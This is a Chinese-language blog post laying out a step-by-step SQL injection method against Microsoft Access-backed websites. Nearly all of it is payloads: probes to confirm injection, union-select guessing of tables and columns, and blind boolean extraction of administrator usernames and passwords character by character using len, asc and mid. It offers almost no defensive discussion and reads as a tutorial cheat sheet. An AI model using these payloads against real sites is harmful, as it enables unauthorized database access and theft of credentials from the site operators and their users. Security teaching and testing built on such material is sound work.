ACCESS SQL 注入

ACCESS SQL 注入

简介

​ Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。

access数据库结构

​ access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。

测试SQL注入方法

联合查询

#判断注入
 and 1=1 
 and 1=2
 
#猜列数
order by 3
	
#猜表名(报错说明表名不存在,将admin换成别的继续猜)
union select 1,2,3 from admin
	
#猜列名(列名位置放置页面上显示的数字位置上)(报错说明列名不存在,换列名继续猜)(列名猜对后输出账号密码)
union select 1,2,username from admin 

逐字猜解法

#判断注入
and 1=1 and 1=2

#猜表名
and exists (select * from admin) 

#猜列名
and exists (select user_name from admin) 

#查数据:
1.确定长度 
and (select top 1 len(user_name ) from admin)=5(user_name 的长度=5,正常则=5,也可以用>,<号去判断)
2.确定asc数据(asc编码)
and (select top 1 asc(mid(user_name ,1,1)) from admin)=97 判断第一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(user_name ,2,1)) from admin)=97 判断第二位

(user_name =admin 第一位a 第二位d 第三位m 第四位i 第五位n pass_word=a48e190fafc257d3)

access注入基本流程

  • 判断有无注入

  • 猜解表名

  • 猜解字段

  • 猜解管理员ID值

  • 猜解用户名和密码长度

  • 猜解用户名和密码

判断有无注入

粗略型:提交单引号'  参数值-1 
逻辑型(数字型注入):and 1=1 / and 1=2
逻辑型(字符型注入):' and '1'='1 / ' and '1'='2
逻辑型(搜索型注入):%' and 1=1 and '%'='% / %' and 1=2 and '%'='%

猜解表名

#用exists判断select * from admin的结果是否为真
and exists (select * from 表名)

#(<>:不等于), count是统计的函数,统计表中的所有字段。列数不等于0说明存在表
and 0<>(select count(*) from 表名) 

猜解字段

#若页面返回正常,就说明admin 表里存在id这个字段
and exists (select id from admin)

猜解管理员ID值

#若页面返回正常,就说明存在id=1的帐号
and exists (select id from admin where id=1)

猜解用户名和密码长度

#猜出存在id=1的帐号,下面语句页面返回正常,就说明UserName字段长度小于6
and exists (select id from admin where len (UserName) >6 and id=1)

#top表示把最前面的一条记录提取出来;
and (select top 1 len(UserName) from admin)=8

猜解用户名和密码

and (select top 1 asc(mid(列名,1,1)) from 表名)>0

and (select top 1 asc(mid(UserName,1,1)) from admin)=97 判断第一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(UserName,2,1)) from admin)=97 判断第二位
posted @ 2022-03-20 20:22  九天揽月丶  阅读(335)  评论(0编辑  收藏  举报